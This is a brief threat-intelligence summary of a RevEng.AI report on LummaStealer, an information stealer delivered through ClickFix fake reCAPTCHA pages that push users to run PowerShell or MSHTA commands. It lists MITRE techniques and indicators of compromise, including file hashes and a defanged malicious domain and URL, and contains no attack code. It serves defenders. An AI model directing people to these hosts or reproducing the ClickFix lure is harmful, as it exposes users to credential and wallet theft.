RevEng.AI has been monitoring LummaStealer, a malware campaign utilizing ClickFix to deceive users into executing malicious commands via fake Google reCAPTCHA pages. The report examines the detailed delivery chain and methods of execution, showcasing how LummaStealer evolves while maintaining its malicious capabilities. The evolving code aims to evade detection mechanisms while facilitating data theft.
Affected: Computer systems, cybersecurity sector
Affected: Computer systems, cybersecurity sector
Keypoints :
- LummaStealer is a malware variant focused on stealing sensitive data.
- It uses ClickFix delivery mechanisms, including fake reCAPTCHA pages, to deceive victims.
- The malware extracts sensitive data like passwords and cryptocurrency wallets.
- RevEng.AI documented the malware’s evolution and delivery chain.
- Multiple approaches are employed, such as PowerShell and MSHTA, to execute malicious commands.
- The detection mechanisms have to adapt to ongoing changes in LummaStealer’s code.
- Progressive stages of the attack chain were detailed, showcasing various obfuscation methods.
MITRE Techniques :
- T1218.005 – System Binary Proxy Execution: MSHTA – Utilizes MSHTA to execute commands loaded through fake reCAPTCHA pages.
- T1059.001 – Command and Scripting Interpreter: PowerShell – Executes PowerShell commands encoded in malicious scripts to download additional payloads.
- T1059.007 – Command and Scripting Interpreter: JavaScript – Implements JavaScript within fake pages to execute payloads and collect user data.
Indicator of Compromise :
- [SHA-256] 179e242265226557187b41ff81b7d4eebbe0d5fe5ff4d6a9cfffe32c83934a46
- [SHA-256] f8cfc73614c279e143b97a0073048925ce8b224ee7ecc03e396d015151147693
- [SHA-256] 3739d6cc6eb06121e504eadffecf71568ddcedb98ee6bbbb75bd4b0244b4aec8
- [Domain] bekind[.]ae
- [URL] https[:]//googlsearchings[.]online/you-have-to-pass-this-step-2.html
Full Story: https://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/